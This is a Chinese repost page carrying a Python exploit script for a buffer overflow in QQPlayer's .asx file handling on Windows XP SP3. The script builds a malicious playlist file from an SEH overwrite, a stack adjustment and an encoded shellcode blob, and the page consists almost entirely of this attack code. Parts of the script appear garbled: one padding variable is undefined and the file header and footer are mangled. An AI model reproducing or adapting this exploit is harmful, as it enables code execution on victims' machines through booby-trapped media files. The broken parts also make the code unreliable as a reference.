QQPlayer asx文件处理缓冲区溢出漏洞漏洞预警 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    #################################################################

    #

    # Title: QQPlayer asx File Processing Buffer Overflow Exploit

    # Author: Li Qingshan of Information Security Engineering Center,School of Software and Microelectronics,Peking University

    # Vendor: www.qq.com

    # Platform. Windows XPSP3 Chinese Simplified

    # Test: QQPlayer 2.3.696.400

    # Vulnerable: QQPlayer<=2.3.696.400p1

    #

    #################################################################

    # Code :

    head =''''''

   

   

    nseh ="\x42\x61\x21\x61"

    seh ="\xa9\x9e\x41\x00"

    adjust="\x30\x83\xc0\x0c"

    shellcode=("PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJIKLM8LI5PUPUPSPMYZEV"

    "QN2BDLKPRVPLKQB4LLK0RR4LKSBWX4ONW1ZWVFQKO6QO0NLWL3QSLS26L7PIQ8ODM5QIWKRZPPRQGL"

    "KQB4PLKPB7L5QXPLKQP2XK5IP44QZ5QXPPPLKQX4XLKQHGPUQN3KSGLQYLKP4LKUQ9FFQKOVQO0NL9"

    "QXODM5QYWFXKPD5JT4C3MZXWK3MWTT5KRPXLKQHWTEQ8SCVLKTLPKLKQH5LEQN3LKS4LKC1XPMY1TW"

    "TGT1KQKSQ0YPZ0QKOKP0XQOQJLKTRJKMVQMCZUQLMLEOIUPUPC0PPRHP1LKROLGKON5OKZPNUORF6R"

    "HOVLUOMMMKOIE7LC6SLUZMPKKM0BU5UOKQWB32R2ORJ5PPSKOHUE3512LSS6N3U2X3UUPDJA")

    junk_="R"*8000

    foot =''''''_playlis.wma"/>

   

    ''''''

    payload=head+junk+nseh+seh+adjust+shellcode+junk_+foot

    fobj = open("poc.asx","w")

    fobj.write(payload)

    fobj.close()

最新文章